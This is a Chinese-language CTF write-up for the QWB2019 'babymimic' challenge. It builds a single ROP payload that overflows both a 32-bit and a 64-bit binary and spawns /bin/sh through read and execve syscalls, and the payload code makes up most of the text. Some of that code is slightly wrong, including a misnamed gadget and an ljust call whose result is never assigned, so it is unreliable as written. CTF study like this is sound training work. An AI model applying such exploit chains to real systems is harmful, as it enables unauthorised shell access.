QWB2019-babymimic

Created2021-08-19Updated2021-08-19

PWN拟态题,需要我们针对两个程序输入输出完全一致,exp要同时能够打穿两个程序。前期的爆破什么的就不看了,看EX师傅的博客就好了

1.程序分为stkof32和stkof64,大多都相同,只是一个是64一个是32,然后程序是标准栈溢出,偏移不同,32位为272字节,64位为280字节,相差8个字节。这里就为一个exp攻破两个程序提供了漏洞,另外由于程序没有开PIE,所以可以直接ROP。

2.这里就用相差的8个字节,即32位程序会比64位的多运行两个指令,那么就针对这两个指令来做文章。

3.这里就是将64位程序的ROP链直接放在ret地址上,32位程序利用多出来的两个指令,下拉esp,把ROP链放在64位ROP链的后面:

(1)64位:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#注释头

#function(rdi,rsi,rdx)

#read /bin/sh
payload += p64(pop_rax_ret) + p64(0x0)
payload += p64(pop_rdi_ret) + p64(0x0)
payload += p64(pop_rsi_ret) + p64(0x0069e200)
payload += p64(pop_rdx_ret) + p64(0x200)
payload += p64(syscall)

#execve("/bin/sh",0,0)
payload += p64(pop_rax_ret) + p64(0x3b)
payload += p64(pop_rdi_ret) + p64(0x0069e200)
payload += p64(pop_rsi_ret) + p64(0x0)
payload += p64(pop_rdx_ret) + p64(0x0)
payload += p64(syscall)

(2)32位:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#注释头

#function(ebx,ecx,edx)

#read /bin/sh 
payload += p32(pop_edx_ecx_edx_ret)
payload += p32(0x200)+p32(0x080d7200)+p32(0x0)
payload += p32(pop_eax_ret) + p32(0x3)
payload += p32(int0x80)

#execve("/bin/sh",0,0)
payload += p32(pop_edx_ecx_ebx_ret)
payload += p32(0x0)+p32(0x0)+p32(0x080d7200)
payload += p32(pop_eax_ret) + p32(0xb)
payload += p32(int0x80)

(3)下拉rsp:

1
2
3
4
#注释头

payload = ""
payload += "A"*offset +p32(add_0x100) + p32(0x0)

▲连起来就是:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#注释头

#add esp
payload = ""
payload += "A"*offset +p32(add_0x100) + p32(0x0)

#read /bin/sh
payload += p64(pop_rax_ret) + p64(0x0)
payload += p64(pop_rdi_ret) + p64(0x0)
payload += p64(pop_rsi_ret) + p64(0x0069e200)
payload += p64(pop_rdx_ret) + p64(0x200)
payload += p64(syscall)

#execve("/bin/sh",0,0)
payload += p64(pop_rax_ret) + p64(0x3b)
payload += p64(pop_rdi_ret) + p64(0x0069e200)
payload += p64(pop_rsi_ret) + p64(0x0)
payload += p64(pop_rdx_ret) + p64(0x0)
payload += p64(syscall)
payload.ljust(0x100-4,'\x00')

#read /bin/sh
payload += p32(pop_edx_ecx_edx_ret)
payload += p32(0x200)+p32(0x080d7200)+p32(0x0)
payload += p32(pop_eax_ret) + p32(0x3)
payload += p32(int0x80)

#execve("/bin/sh",0,0)
payload += p32(pop_edx_ecx_ebx_ret)
payload += p32(0x0)+p32(0x0)+p32(0x080d7200)
payload += p32(pop_eax_ret) + p32(0xb)
payload += p32(int0x80)

其他的就是找ROP了,这个不说了,这里能找到这么多gadget,纯粹就是因为程序是静态的,gadget无敌多,如果不是静态的,可能还得费一番功夫。

参考资料:

https://www.dazhuanlan.com/bob24/topics/1295510